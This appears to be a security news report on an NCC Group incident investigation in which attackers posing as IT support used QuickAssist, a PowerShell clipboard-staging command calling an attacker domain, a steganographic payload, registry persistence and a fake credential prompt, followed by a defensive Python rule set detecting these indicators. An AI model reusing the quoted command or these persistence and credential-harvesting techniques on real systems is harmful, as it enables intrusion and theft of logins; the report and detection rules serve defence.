Corporate systems were compromised in under five minutes by cybercriminals leveraging social engineering and PowerShell scripting, according to an investigation conducted by the NCC Group’s Digital Forensics and Incident Response (DFIR) team.
The attackers impersonated internal IT support and contacted approximately twenty employees, ultimately convincing two users to allow remote access via QuickAssist.exe, a legitimate Windows remote assistance tool. Once inside, threat actors initiated an attack chain designed for speed and persistence.
QuickAssist Enables Rapid Access and Malicious Payload Execution
Within 300 seconds of entry, the attackers executed a clipboard manipulation command using PowerShell: (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard. This set the stage for the download and deployment of malicious tools embedded via steganography within a JPEG file hosted at hxxps://resutato[.]com/b2/res/nh2.jpg.
The embedded payload, concealed inside the image file, was decrypted using a four-byte XOR key (0x31, 0x67, 0xBE, 0xE1) to reconstruct a ZIP archive. This archive contained components of NetSupport Manager, disguised as benign “NetHealth” software.
Credential Theft and Persistent Access
Post-deployment, attackers established long-term persistence through scheduled tasks and registry entries. These included the use of regsvr32.exe to run randomised DLLs every five minutes and registry manipulation via HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\NETHEALTH.
The malware abused trusted Windows binaries such as msiexec.exe and GenUp.exe to sideload a malicious libcurl.dll file.
A particularly alarming feature was the PowerShell-based credential harvesting GUI. This tool, located at C:\Users\{username}\Videos\l.ps1, created a full-screen overlay that mimicked an official system verification dialog. The prompt harvested plaintext user credentials and stored them in $env:TEMP\cred.txt, while disabling system navigation to prevent escape.
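Detection logic for the chain described in this article, as an added example (not NCC Group's tooling): a small rule set run over process-creation, registry, image-load and file-create events, covering the clipboard staging command, QuickAssist spawning a shell, the NETHEALTH Run key, regsvr32.exe loading DLLs from a user profile, libcurl.dll sideloading by msiexec.exe or GenUp.exe, the credential-prompt script under Videos, and the cred.txt drop. The event lines below are constructed in a simplified key=value form (Sysmon-like field names, sample user and paths are placeholders); only the Run key, the domain and the l.ps1 / cred.txt names come from the article.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern


# \bImage= avoids matching the "Image=" inside "ParentImage=".
RULES = [
    Rule("clipboard_staging",
         re.compile(r"(?i)(curl|iwr|invoke-webrequest|wget)\b.*\|\s*set-clipboard")),
    Rule("quickassist_spawns_shell",
         re.compile(r"(?i)\bImage=.*\\(powershell|pwsh|cmd)\.exe.*ParentImage=.*\\quickassist\.exe")),
    Rule("run_key_nethealth",
         re.compile(r"(?i)TargetObject=HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\NETHEALTH")),
    Rule("regsvr32_user_dll",
         re.compile(r"(?i)\bImage=.*\\regsvr32\.exe.*CommandLine=.*[A-Z]:\\Users\\[^ ]+\.dll")),
    Rule("libcurl_sideload",
         re.compile(r"(?i)\bImage=.*\\(msiexec|genup)\.exe.*ImageLoaded=.*\\Users\\.*\\libcurl\.dll")),
    Rule("credential_prompt_script",
         re.compile(r"(?i)CommandLine=.*\\Videos\\[^ ]*\.ps1")),
    Rule("cred_txt_write",
         re.compile(r"(?i)TargetFilename=.*\\Temp\\cred\.txt")),
]

# Constructed sample telemetry; user "alice" and the paths are placeholders.
SAMPLE_EVENTS = [
    r"ProcessCreate Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe CommandLine=powershell (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard",
    r"RegistryValueSet TargetObject=HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\NETHEALTH Details=C:\Users\alice\AppData\Roaming\NetHealth\client.exe",
    r"ProcessCreate Image=C:\Windows\System32\regsvr32.exe ParentImage=C:\Windows\System32\svchost.exe CommandLine=regsvr32.exe /s C:\Users\alice\AppData\Local\a8f3k2.dll",
    r"ImageLoad Image=C:\Users\alice\AppData\Roaming\NetHealth\GenUp.exe ImageLoaded=C:\Users\alice\AppData\Roaming\NetHealth\libcurl.dll",
    r"ProcessCreate Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine=powershell -File C:\Users\alice\Videos\l.ps1",
    r"FileCreate Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename=C:\Users\alice\AppData\Local\Temp\cred.txt",
    # Benign noise: an installer registering a system DLL, and a harmless clipboard read.
    r"ProcessCreate Image=C:\Windows\System32\regsvr32.exe ParentImage=C:\Windows\System32\msiexec.exe CommandLine=regsvr32.exe /s C:\Windows\System32\scrrun.dll",
    r"ProcessCreate Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine=powershell Get-Clipboard",
]


def triage(lines: list[str]) -> list[tuple[int, str]]:
    """Return (1-based line number, rule name) for every rule each line trips."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for rule in RULES:
            if rule.pattern.search(line):
                hits.append((lineno, rule.name))
    return hits


def summarize(hits: list[tuple[int, str]]) -> dict[str, int]:
    """Count hits per rule; several distinct rules firing on one host is the signal."""
    counts: dict[str, int] = {}
    for _, name in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for lineno, name in triage(SAMPLE_EVENTS):
        print(f"line {lineno}: {name}")
    print(summarize(triage(SAMPLE_EVENTS)))
```

No single rule here is conclusive on its own (regsvr32.exe and msiexec.exe are everyday binaries), which is why the summary counts distinct rules rather than raw matches: QuickAssist spawning PowerShell, followed within minutes by a Run key write and a DLL loaded from a user profile, is the pattern worth paging on.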
Communication with attacker-controlled domains like resutato[.]com and nimbusvaults[.]com provided the adversaries with full remote access and control capabilities.
Security experts warn that the speed and sophistication of the breach highlight the critical need for improved user training and rapid response protocols. Trusted tools, once exploited, can facilitate devastating breaches within minutes.